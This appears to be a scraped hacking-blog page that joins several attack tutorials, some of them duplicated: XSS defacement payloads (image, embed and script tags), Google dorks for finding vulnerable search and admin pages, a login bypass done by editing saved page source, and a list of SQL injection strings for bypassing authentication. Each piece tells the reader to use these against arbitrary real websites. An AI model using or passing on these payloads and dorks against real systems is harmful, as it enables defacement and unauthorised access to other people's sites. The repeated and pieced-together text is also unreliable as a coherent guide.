Showing posts with label website. Show all posts
How to Deface a Website using XSS ?
How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface
methods, there are many ways for defacing i will mention some of the best and most used,
the first one being IMG SCR, now for those of you who dont know html, IMG SCR
is a tag, that displays the IMAGE linked to it on the webpage.
<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>
ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything
that shows your data after you submitted it you could insert the following to make the picture display on the page.
<IMG SRC="http://site.com/yourDefaceIMAGE.png">
The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.
<EMBED SRC="http://site.com/xss.swf"
That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.ashacks.blogspot.com/" )</script>
There are many others ways that you can found using Google or other website.
Mine purpose is to make you understand the concept :)
Well now you understand how XSS works, we can explain some simple XSS deface
methods, there are many ways for defacing i will mention some of the best and most used,
the first one being IMG SCR, now for those of you who dont know html, IMG SCR
is a tag, that displays the IMAGE linked to it on the webpage.
<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>
ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything
that shows your data after you submitted it you could insert the following to make the picture display on the page.
<IMG SRC="http://site.com/yourDefaceIMAGE.png">
The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.
<EMBED SRC="http://site.com/xss.swf"
That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.ashacks.blogspot.com/" )</script>
There are many others ways that you can found using Google or other website.
Mine purpose is to make you understand the concept :)
XSS ATTACK
How to Find XSS Vulnerabilities:-
To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.
Using 'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good
eye, and some good knowledge on how to bypass there filteration.
Basics of XSS:
Well now lets start learning some Actual Methods, the most common used XSS
injection is :
<script>alert("ASHACKS")</script>
now this will alert a popup message, saying "ASHACKS" without quotes.
So,use "search.php?q=" and you can simple try the following on a website with the
same thing,
http://website.com/search.php?q=<script>alert("ASHACKS")</script>
There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :
http://website.com/search.php?q=<br><br><b><u>ASHACKS</u></b>
if you see the bold text on the page and newlines then you knows its vulnerable.
Example:
To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.
Using 'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good
eye, and some good knowledge on how to bypass there filteration.
Basics of XSS:
Well now lets start learning some Actual Methods, the most common used XSS
injection is :
<script>alert("ASHACKS")</script>
now this will alert a popup message, saying "ASHACKS" without quotes.
So,use "search.php?q=" and you can simple try the following on a website with the
same thing,
http://website.com/search.php?q=<script>alert("ASHACKS")</script>
There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :
http://website.com/search.php?q=<br><br><b><u>ASHACKS</u></b>
if you see the bold text on the page and newlines then you knows its vulnerable.
Example:
hack Website with Basic HTML Coding
hack Website with Basic HTML Coding
Edited by June, Chris Hadley, Max1508, Skycaptain95 and 59 others
If you have basic HTML and JavaScript knowledge, you may be able to
access password protected websites. This article will give you an easy
method to hack simple, less-secured websites of your choice simply
through HTML. Use it responsibly.Note: This basic method works only for websites with extremely low security barriers. Websites with robust security details will not be susceptible to this kind of simple attack
Steps
-
1Open the site you want to hack. Provide wrong username/password combination in its log in form. (e.g. : Username : me and Password: ' or 1=1 --)An error will occur saying wrong username-password. Now be prepared your experiment starts from here.2Right click anywhere on that error page =>> go to view source.
-
3There you can see the HTML coding with JavaScript.• There you find somewhat like this....<_form action="...Login....">• Before this login information copy the URL of the site in which you are. (e.g. :"< _form..........action=http://www.targetwebsite.com/login.......>")
-
4Then delete the JavaScript from the above that validates your information in the server.(Do this very carefully, your success to hack the site depends upon this i.e. how efficiently you delete the java scripts that validate your account information)
-
5Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=password>" with "<_type=text>". See there if maximum length of password is less than 11 then increase it to 11 (e.g. : if then write )
-
6Just go to file => save as and save it anywhere in your hard disk with ext.html(e.g.: c:\chan.html)
-
7Reopen your target web page by double clicking 'chan.html' file that you saved in your hard disk earlier.• You see that some changes in current page as compared to original One. Don't worry.
-
8Provide any username [e.g.: hacker] and password [e.g.:' or 1=1 --] You have successfully cracked the above website and entered into the account of List user saved in the server's database.
easiest method without any software....sql injection...
Exploiting Web Applications by SQL Injection (Step By Step Tutorial)
Hello Readers, Today I am sharing with you how to
exploit web application by SQL Injection Attack. In this post step by step I show
you how to bypass admin login using some queries.
What
is SQL Injection?
SQL Injection is a code injection technique that
exploits a security vulnerability occurring in the database layer of an
application. The vulnerability is present when user input is either incorrectly
filtered for string literal escape characters embedded in SQL statements or
user input is not strongly typed and thereby unexpectedly executed. It is an
instance of a more general class of vulnerabilities that can occur whenever one
programming or scripting language is embedded inside another. SQL injection
attacks are also known as SQL insertion attacks.
[Step – 1] Find
SQL Injection Vulnerable Website
First we need vulnerable site to the attack. This is the first step in SQL injection exploitation and like every other hacking attack is the most time consuming, and is the only time consuming step.
1)
By Google Dork
Google dorks are the center of the Google Hacking.
Google database is the biggest so hackers use to exploit that database by using
various search engine commands or complex search queries to locate sensitive
data and vulnerable devices on the internet. For Example use this Google Dork
to find randomly vulnerable website for SQL injection.
There
is a large number of Google dork for basic SQL injection. Here is the best:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp
after this you will see many websites in google search ..
try the sql injection on these...
[Step - 2] SQL Injection Queries
Here is some popular SQL injection queries list. We
can use these to bypass login authentication. These queries confuse the
databases.
‘or’’=’
admin'--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
hi" or "a"="a
hi" or 1=1 --
